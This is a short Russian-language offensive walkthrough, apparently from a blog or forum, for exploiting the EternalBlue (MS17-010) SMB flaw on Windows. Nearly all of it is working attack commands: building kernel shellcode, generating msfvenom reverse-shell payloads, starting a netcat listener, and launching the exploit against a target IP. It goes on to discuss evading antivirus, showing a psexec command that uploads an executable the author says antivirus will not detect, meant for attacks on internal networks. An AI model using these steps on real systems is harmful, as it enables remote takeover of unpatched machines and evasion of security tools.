**Эксплуатация EternalBlue через выполнение shellcode в ядре

Windows**

git clonehttps://github.com/worawit/MS17-010.git

cd MS17-010/

  1. Соберем ассемблерный код первой части полезной нагрузки:

$ nasm -f bin eternalblue_kshellcode_x86.asm -o ./sc_x86_kernel.bin

$ nasm -f bin eternalblue_kshellcode_x64.asm -o ./sc_x64_kernel.bin

  1. Подготовим вторую часть:

$ msfvenom -p windows/shell_reverse_tcp LHOST=10.0.2.Y LPORT=4444 -f raw -o sc_x86_msf.bin EXITFUNC=thread $ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.0.2.Y LPORT=4444 -a x64 -f raw -o sc_x64_msf.bin EXITFUNC=thread

  1. Соберем универсальную нагрузку:

$ cat sc_x86_kernel.bin sc_x86_msf.bin > sc_x86.bin $ cat sc_x64_kernel.bin sc_x64_msf.bin > sc_x64.bin $ python2.7 eternalblue_sc_merge.py sc_x86.bin sc_x64.bin sc_all.bin

  1. Подготовим handler:

$ nc -lp 4444

  1. Проэксплуатируем уязвимость:

$ python2.7 eternalblue_exploit7.py 10.0.2.X ./shellcode/sc_all

Это считается продвинутым способом эксплуатации, но фактически такие манипуляции на раз два обнаруживаются антивирусными средствами защиты. Поэтому в ход вступает либо гугуление на предмет обфускации, разработка малваря или обфускация не только сигнатур но и поведения вспомогательных утилит таких как psexec, к которой мы вернемся чуть позже.

psexec.py admin:[email protected] -debug -file ySfpwzUH_heh.exe

Мой исполняемый файл уже не будет замечен антивирусом и позволит выполнять дальнейшие действия по атаке на внутреннюю инфраструктуру.

https://codeby.net/threads/obxod-antivirusa-s-pomoschju-metasploita.69423/